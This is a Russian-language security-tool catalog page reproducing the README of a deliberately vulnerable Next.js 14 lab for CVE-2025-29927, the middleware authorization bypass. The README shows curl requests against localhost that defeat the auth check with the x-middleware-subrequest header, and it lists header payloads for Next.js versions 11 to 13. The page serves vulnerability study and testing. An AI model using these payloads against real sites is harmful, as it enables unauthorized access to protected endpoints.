Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 — Среда воспроизведения для CVE-2025-29927, демонстрирующая обход авторизации промежуточного ПО Next.js через заголовок x-middleware-subrequest. Включает шаги эксплуатации с использованием curl для нескольких версий Next.js. | Kitploit
Инструменты/GitHubGitHub/lirantal/vulnerable-nextjs-14-cve-2025-29927
Аутентификация и авторизацияАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHublirantal/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

Среда воспроизведения для CVE-2025-29927, демонстрирующая обход авторизации промежуточного ПО Next.js через заголовок x-middleware-subrequest. Включает шаги эксплуатации с использованием curl для нескольких версий Next.js.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1482 месяцев назадЕщё не проверено

Воспроизведение обхода авторизации CVE-2025-29927

Этот репозиторий является воспроизведением уязвимости CVE-2025-29927 в пакете next

Как воспроизвести

  1. Выполните приведённые ниже шаги, чтобы клонировать и запустить приложение Next.js
  2. Проверьте, что авторизация запрещает доступ к конечной точке /api/hello
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. Проверьте, что авторизация работает при предоставлении токена
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. Теперь её также можно обойти, если вложить middleware 5 раз в специальный заголовок x-middleware-subrequest:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

Эксплуатация CVE-2025-29927 для старых версий Next.js

В версиях Next.js 12 и 13 использовалось другое соглашение об именовании файла промежуточного ПО (_middleware.js), которое было изменено на middleware.js в Next.js 14. Эту уязвимость можно эксплуатировать в старых версиях, используя файл _middleware.js.

Например, в зависимости от версии Next.js и соглашения о маршрутизации будут применимы следующие полезные нагрузки:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (для версий Next.js 12.2 с файлом middleware.js в корне приложения, а не внутри каталога pages)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (для версий Next.js 11 и до 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

Начало работы

Сначала запустите сервер разработки:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

Откройте http://localhost:3000 в своём браузере, чтобы увидеть результат.

Вы можете начать редактировать страницу, изменив app/page.js. Страница автоматически обновляется по мере редактирования файла.

Этот проект использует next/font для автоматической оптимизации и загрузки Geist, нового семейства шрифтов для Vercel.

Узнать больше

Чтобы узнать больше о Next.js, ознакомьтесь с этими ресурсами:

  • Документация Next.js — узнайте о возможностях и API Next.js.
  • Изучение Next.js — интерактивный учебник по Next.js.

Вы можете посетить репозиторий Next.js на GitHub — ваши отзывы и вклад приветствуются!

Развёртывание на Vercel

Самый простой способ развернуть приложение Next.js — использовать Платформу Vercel от создателей Next.js.

Ознакомьтесь с нашей документацией по развёртыванию Next.js для получения дополнительных сведений.

Участие

Пожалуйста, ознакомьтесь с CONTRIBUTING для получения рекомендаций по участию в этом проекте.

Скачать инструмент